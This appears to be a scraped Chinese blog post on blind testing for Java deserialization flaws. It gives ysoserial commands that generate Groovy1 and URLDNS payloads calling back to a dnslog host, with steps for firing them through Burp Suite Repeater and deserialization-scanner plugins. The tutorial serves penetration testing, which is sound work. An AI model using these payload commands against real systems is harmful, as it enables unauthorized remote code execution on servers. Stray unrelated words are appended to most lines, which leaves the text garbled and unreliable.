java反序列化盲打與手工測試

1.生成測試payload:

cd D:\plug_in\BurpSuite JAVA反序列化漏洞掃描插件java

//下面的語句意思就是反連到你自已的dnslog平臺:git

java -jar ./ysoserial-0.0.5.jar Groovy1 "ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org" > payload1.txtgithub

 

java -jar ./ysoserial-0.0.6-SNAPSHOT-BETA-all.jar URLDNS http://t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org/ > payload1.txt測試

 

 

2.burpsuite中載入paload1.txt:ui

Repeater->右鍵選「Paste from file"url

   

//dnslog平臺上面看結果:spa

 3.burpsuite反序列化插件的測試截圖:.net

下載地址:https://github.com/federicodotta/Java-Deserialization-Scanner/插件

 

四、burpsuite JavaSerialKiller插件測試java反序列化漏洞:

 

 

  

ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org blog

相關文章
相關標籤/搜索